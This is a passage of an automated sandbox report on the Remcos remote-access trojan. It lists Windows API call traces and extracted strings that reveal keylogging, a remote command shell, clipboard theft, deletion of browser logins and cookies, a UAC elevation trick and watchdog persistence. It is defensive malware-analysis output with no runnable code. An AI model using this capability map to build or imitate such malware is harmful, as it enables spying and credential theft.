                                                                                                                      • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                                                                                      • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                                                                                                                      • API String ID: 2918587301-599666313
                                                                                                                      • Opcode ID: 67ca82a687dc1e454a75cc368f4517d0e6d9aa3d6c6889860952e852b2957f07
                                                                                                                      • Instruction ID: 1bc88c7e1bb4371a25effcd92402389f4e4e7f2dfcf0a55fa2f5aa785e242239
                                                                                                                      • Opcode Fuzzy Hash: 67ca82a687dc1e454a75cc368f4517d0e6d9aa3d6c6889860952e852b2957f07
                                                                                                                      • Instruction Fuzzy Hash: CC42A372A043005BC604F776C8979AF76A59F90718F40493FF946771E2EE3CAA09C69B
                                                                                                                      APIs
                                                                                                                      • __Init_thread_footer.LIBCMT ref: 0040508E
                                                                                                                        • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475D4C,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 004334E9
                                                                                                                        • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 0043351C
                                                                                                                        • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                      • __Init_thread_footer.LIBCMT ref: 004050CB
                                                                                                                      • CreatePipe.KERNEL32(00475D0C,00475CF4,00475C18,00000000,0046556C,00000000), ref: 0040515E
                                                                                                                      • CreatePipe.KERNEL32(00475CF8,00475D14,00475C18,00000000), ref: 00405174
                                                                                                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C28,00475CFC), ref: 004051E7
                                                                                                                        • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,?,00475D4C,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433534
                                                                                                                        • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433571
                                                                                                                      • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                                                                                                                      • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                                                                                      • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                                                                                        • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                                                                                                                      • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                                                                                                                      • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                                                                                      • CloseHandle.KERNEL32 ref: 004053CD
                                                                                                                      • CloseHandle.KERNEL32 ref: 004053D5
                                                                                                                      • CloseHandle.KERNEL32 ref: 004053E7
                                                                                                                      • CloseHandle.KERNEL32 ref: 004053EF
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                                      • String ID: (\G$SystemDrive$cmd.exe$p\G$p\G$p\G$p\G$p\G
                                                                                                                      • API String ID: 3815868655-1274243119
                                                                                                                      • Opcode ID: 8cbc04d304936592b8c30d8c5467e03ddebc48fda1e63d99d06426c92a2a1825
                                                                                                                      • Instruction ID: e174317c0cfdf92f2f57875e471bcaa01af682fbbee25a17085fe39bc952a1f7
                                                                                                                      • Opcode Fuzzy Hash: 8cbc04d304936592b8c30d8c5467e03ddebc48fda1e63d99d06426c92a2a1825
                                                                                                                      • Instruction Fuzzy Hash: 97910971504705AFD701BB25EC45A2F37A8EB84344F50443FF94ABA2E2DABC9D448B6E
                                                                                                                      APIs
                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                                                                                                        • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                        • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                        • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                      • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                                                                                                        • Part of subcall function 004124B7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                                        • Part of subcall function 004124B7: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                                        • Part of subcall function 004124B7: RegCloseKey.KERNELBASE(?), ref: 00412500
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                                                                                                        • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                      • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                                                                                      • String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                                                                                                                      • API String ID: 65172268-860466531
                                                                                                                      • Opcode ID: 3d2ec039f958bf048a8c201d7f8a81e9ba8d6979ff7f871c800e70ef052d4e82
                                                                                                                      • Instruction ID: cd90af3caa6d69ca3e9ea8718b5663318d6259183dea3b669bddfb6979e5fbe1
                                                                                                                      • Opcode Fuzzy Hash: 3d2ec039f958bf048a8c201d7f8a81e9ba8d6979ff7f871c800e70ef052d4e82
                                                                                                                      • Instruction Fuzzy Hash: 9F718E316042415BC614FB32D8579AE77A4AED4718F40053FF582A21F2EF7CAA49C69F
                                                                                                                      APIs
                                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                                                                                      • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0040B517
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$CloseFile$FirstNext
                                                                                                                      • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                                      • API String ID: 1164774033-3681987949
                                                                                                                      • Opcode ID: a55c21d547313303409bc2568ceb902046709c86c763491b0c53e4f2ca284d26
                                                                                                                      • Instruction ID: 6ff196721abdd8e0f3db8d3f3c96df629808f1f9148939b99990ee587e15bfec
                                                                                                                      • Opcode Fuzzy Hash: a55c21d547313303409bc2568ceb902046709c86c763491b0c53e4f2ca284d26
                                                                                                                      • Instruction Fuzzy Hash: 31512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                                                                                                                      APIs
                                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                                                                                      • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$Close$File$FirstNext
                                                                                                                      • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                      • API String ID: 3527384056-432212279
                                                                                                                      • Opcode ID: a71f50fce03a6b89e47498d88d246ee68c23d58d563221132017ac6cdd0e80fc
                                                                                                                      • Instruction ID: 007be0ece90fca0e9f39ea1f272cf2b8da877aadfcc1370f70eac597690c30d9
                                                                                                                      • Opcode Fuzzy Hash: a71f50fce03a6b89e47498d88d246ee68c23d58d563221132017ac6cdd0e80fc
                                                                                                                      • Instruction Fuzzy Hash: A7414B319042196ACB14F7A1EC569EE7768EF21318F50017FF801B31E2EF399A45CA9E
                                                                                                                      APIs
                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                                                                                                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                                                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                                                                                                        • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                        • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                        • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                                                                                      • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                                                                                                                      • API String ID: 726551946-3025026198
                                                                                                                      • Opcode ID: 30da1d47b11118a268f62bc142a88eb8f37d6f01f4d3dd7acdbf78fe8c56f144
                                                                                                                      • Instruction ID: ff5f769c9d2eb9d60ee5c92f3007ac3329fe223f24fa54890becbfeace6a8f7f
                                                                                                                      • Opcode Fuzzy Hash: 30da1d47b11118a268f62bc142a88eb8f37d6f01f4d3dd7acdbf78fe8c56f144
                                                                                                                      • Instruction Fuzzy Hash: 647182311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A919CA9A
                                                                                                                      APIs
                                                                                                                      • OpenClipboard.USER32 ref: 004159C7
                                                                                                                      • EmptyClipboard.USER32 ref: 004159D5
                                                                                                                      • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 004159FE
                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                                                                                                                      • CloseClipboard.USER32 ref: 00415A5A
                                                                                                                      • OpenClipboard.USER32 ref: 00415A61
                                                                                                                      • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                                      • CloseClipboard.USER32 ref: 00415A89
                                                                                                                        • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3520204547-0
                                                                                                                      • Opcode ID: 6ed8a15f85b4eda99e75bc68e9c644e8b427782961166fcaf36fdd4c8f2d64f9
                                                                                                                      • Instruction ID: 65deba99f03779ab530566add8b8501f772d12743f07501a5a0e0bdfe921cf26
                                                                                                                      • Opcode Fuzzy Hash: 6ed8a15f85b4eda99e75bc68e9c644e8b427782961166fcaf36fdd4c8f2d64f9
                                                                                                                      • Instruction Fuzzy Hash: 232183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 0$1$2$3$4$5$6$7
                                                                                                                      • API String ID: 0-3177665633
                                                                                                                      • Opcode ID: aa35b6c391b669857e709787408fc35d19a5eec55d3d5a0aced25700c68607bb
                                                                                                                      • Instruction ID: 8a7243103da74f60d5bbefacb9012cb64624b509857c51ebf6f1776beea37390
                                                                                                                      • Opcode Fuzzy Hash: aa35b6c391b669857e709787408fc35d19a5eec55d3d5a0aced25700c68607bb
                                                                                                                      • Instruction Fuzzy Hash: EE61B470508301AEDB00EF21C862FEE77E4AF95754F40485EF591672E2DB78AA48C797
                                                                                                                      APIs
                                                                                                                      • GetForegroundWindow.USER32 ref: 00409B3F
                                                                                                                      • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                                      • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                                      • GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                                      • GetKeyboardState.USER32(?), ref: 00409B67
                                                                                                                      • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                                                      • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                                                      • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                                                      • String ID: X[G
                                                                                                                      • API String ID: 1888522110-739899062
                                                                                                                      • Opcode ID: e493efd0b8b4558b132da8245606e3aa1f2ec85b30bd84d249f064ae8ad69455
                                                                                                                      • Instruction ID: b3d75429b008435a5e1dd269aa2dc422b6d7dab2ccd5499d38c457950c038251
                                                                                                                      • Opcode Fuzzy Hash: e493efd0b8b4558b132da8245606e3aa1f2ec85b30bd84d249f064ae8ad69455
                                                                                                                      • Instruction Fuzzy Hash: 7C318F72544308AFE700DF90EC45FDBBBECEB48715F00083ABA45961A1D7B5E948DBA6
                                                                                                                      APIs
                                                                                                                      • _wcslen.LIBCMT ref: 00406788
                                                                                                                      • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Object_wcslen
                                                                                                                      • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                                      • API String ID: 240030777-3166923314
                                                                                                                      • Opcode ID: fb4b37c01a82ea3e6f4d6ea97501aa73dd573a9fa8d004a292a27325ecfbba87
                                                                                                                      • Instruction ID: 8131e8b3f96e11b5c9c7103c6ecb9350ac77814929071503a065d606a7b617cc
                                                                                                                      • Opcode Fuzzy Hash: fb4b37c01a82ea3e6f4d6ea97501aa73dd573a9fa8d004a292a27325ecfbba87
                                                                                                                      • Instruction Fuzzy Hash: A11170B2901118AEDB10FAA58849A9EB7BCDB48714F55007BE905F3281E77C9A148A7D
                                                                                                                      APIs
                                                                                                                      • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,00474918), ref: 004198E8
                                                                                                                      • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419937
                                                                                                                      • GetLastError.KERNEL32 ref: 00419945
                                                                                                                      • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041997D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3587775597-0
                                                                                                                      • Opcode ID: 3ac6ab5d256872219fc595c736f1fa07358be726c92bd725a469ceb362d7fbf0
                                                                                                                      • Instruction ID: 19b9a1677c56063b65225fc9a0f34bb07ffc83518ef4baa2b379b487d5559ddd
                                                                                                                      • Opcode Fuzzy Hash: 3ac6ab5d256872219fc595c736f1fa07358be726c92bd725a469ceb362d7fbf0
                                                                                                                      • Instruction Fuzzy Hash: 84813F711083049BC714FB21DC959AFB7A8BF94718F50493EF582521E2EF78EA05CB9A
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                                                                                                                      • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                                                                                                      • GetLastError.KERNEL32 ref: 00409A1B
                                                                                                                        • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                                                                                                                      • TranslateMessage.USER32(?), ref: 00409A7A
                                                                                                                      • DispatchMessageA.USER32(?), ref: 00409A85
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                                      • String ID: Keylogger initialization failure: error $`#v
                                                                                                                      • API String ID: 3219506041-3226811161
                                                                                                                      • Opcode ID: 0b7731a1732448719b2bf699768c997a41862952e5444ada4ba6697cad37b533
                                                                                                                      • Instruction ID: 51093fa3456b5fa5e68b97b38f4420b838fb12217e42543f2b1c539fb4fc9beb
                                                                                                                      • Opcode Fuzzy Hash: 0b7731a1732448719b2bf699768c997a41862952e5444ada4ba6697cad37b533
                                                                                                                      • Instruction Fuzzy Hash: 281194716043015FC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAA
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B499
                                                                                                                      • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4CB
                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B539
                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B546
                                                                                                                        • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B51C
                                                                                                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B571
                                                                                                                      • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B578
                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,004742E0,004742F8), ref: 0041B580
                                                                                                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B593
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2341273852-0
                                                                                                                      • Opcode ID: 0297631c5ee8ecb1d1a4c9aeac50dc6e63fd93f3a2d20230b54752594d88c721
                                                                                                                      • Instruction ID: 0b65015344b940e71c8db0708908b2546b6e9c6134e65c3d42cb3d4753665141
                                                                                                                      • Opcode Fuzzy Hash: 0297631c5ee8ecb1d1a4c9aeac50dc6e63fd93f3a2d20230b54752594d88c721
                                                                                                                      • Instruction Fuzzy Hash: 4D31937180921C6ACB20D771AC49FDA77BCAF08304F4405EBF505D3182EB799AC4CA69
                                                                                                                      APIs
                                                                                                                      • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
                                                                                                                        • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                      • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                                      • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                                      • API String ID: 2127411465-314212984
                                                                                                                      • Opcode ID: cdf3afb16bf801ea2708effcdf9d89e84c92b75c8538a533412dad7cd73da0bf
                                                                                                                      • Instruction ID: 77d0e0f665ec2cae06f71cdba8331079b705a8b2343c1238c9795aa136ea70b2
                                                                                                                      • Opcode Fuzzy Hash: cdf3afb16bf801ea2708effcdf9d89e84c92b75c8538a533412dad7cd73da0bf
                                                                                                                      • Instruction Fuzzy Hash: 0AB1B571A043006BC614BA75CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
                                                                                                                      APIs
                                                                                                                      • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                                                                                                      • GetLastError.KERNEL32 ref: 0040B261
                                                                                                                      Strings
                                                                                                                      • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                                                                                                      • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                                                                                                      • UserProfile, xrefs: 0040B227
                                                                                                                      • [Chrome StoredLogins not found], xrefs: 0040B27B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: DeleteErrorFileLast
                                                                                                                      • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                                      • API String ID: 2018770650-1062637481
                                                                                                                      • Opcode ID: c40f0bbe6ac281c9bc18074575bfe4029dca0a9d2103736dcf0ec681c75a3121
                                                                                                                      • Instruction ID: b4925b9b145212f78872d6bf605c5cdf000d45b1535ad2fa459343da0bf9ff5a
                                                                                                                      • Opcode Fuzzy Hash: c40f0bbe6ac281c9bc18074575bfe4029dca0a9d2103736dcf0ec681c75a3121
                                                                                                                      • Instruction Fuzzy Hash: 8C01623168410597CA0577B5ED6F8AE3624E921718F50017FF802731E6FF7A9A0586DE
                                                                                                                      APIs
                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                                      • GetLastError.KERNEL32 ref: 00416B02
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                      • String ID: SeShutdownPrivilege
                                                                                                                      • API String ID: 3534403312-3733053543
                                                                                                                      • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                                      • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                                                                                                                      • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                                      • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                                                                                                                      APIs
                                                                                                                      • __EH_prolog.LIBCMT ref: 004089AE
                                                                                                                        • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                                                        • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                                      • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                                                                                                      • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                                                                                                        • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000), ref: 0040450E
                                                                                                                        • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                                                                                        • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
